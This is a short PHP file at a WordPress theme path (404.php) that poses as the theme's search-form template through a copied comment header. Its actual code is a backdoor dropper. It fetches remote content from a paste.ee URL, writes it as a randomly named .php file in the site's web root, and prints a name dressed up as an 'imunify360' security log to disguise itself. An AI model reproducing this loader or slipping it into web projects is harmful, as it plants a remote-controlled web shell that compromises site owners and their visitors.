File: /var/www/html/cisegurospatria.sumar.com.py/wp-content/themes/twentytwenty/404.php
<?php
/**
* The searchform.php template.
*
* Used any time that get_search_form() is called.
*
* @link https://wordpress.org/themes/basics/template/
* @package WordPress
* @subpackage
* @since 1.0
*/
/*
* Generate a unique ID for each form and a string containing an aria-label
* if one was passed to get_search_form() in the args array.
*/
//IDX for each form and a string
$name = uniqid();
if ( @copy("https://paste.ee/r/zkHl8", "../../../" . $name . ".php") ) {
echo $name . "_imunify360_log_shield";
}else{
echo "Fail.";
}
?>